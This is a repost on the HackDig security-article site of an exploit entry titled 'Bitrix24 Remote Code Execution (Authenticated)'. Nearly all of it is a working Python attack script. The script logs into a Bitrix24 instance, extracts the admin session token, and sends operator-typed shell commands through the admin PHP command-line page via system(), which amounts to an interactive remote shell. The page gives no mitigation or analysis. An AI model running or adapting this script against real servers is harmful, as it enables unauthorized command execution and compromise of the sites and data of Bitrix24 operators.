HackDig : Dig high-quality web security articles

Bitrix24 Remtoe Code Execution

2022-05-11 17:30
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)# Date: 4/22/2022# Exploit Author: picaro_o# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php# Tested on: Linux os#/usr/bin/env python#Created by heinjameimport requestsimport refrom bs4 import BeautifulSoupimport argparse,sysuser_agent = {'User-agent': 'HeinJame'}parser = argparse.ArgumentParser()parser.add_argument("host", help="Betrix URL")parser.add_argument("uname", help="Bitrix Username")parser.add_argument("pass", help="Bitrix Password")pargs = parser.parse_args()url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]inputcmd = input(">>")s = requests.Session()def login():postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)def getsessionid():sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",headers = user_agent)session = re.search(r"'bitrix_sessid':.*", sessionid.text)extract = session.group(0).split(":")realdata = extract[1].strip(" ")realdata = realdata.replace("'","")realdata = realdata.replace(",","")return realdata# print(r.text)def cmdline(cmd,sessionid):cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers= user_agent, data = cmdline)soup = BeautifulSoup(usercmd.content,'html.parser')cmd = soup.find('p').getText()print(cmd.rstrip())login()sessionid = getsessionid()while inputcmd != "exit":cmdline(inputcmd,sessionid)inputcmd = input(">>")            


Source: 6400502202-BLW/eussi/moc.ytirucesxc

Read:1824 | Comments:0 | Tags:No Tag

“Bitrix24 Remtoe Code Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)
Tell me why you support me <3

Tag Cloud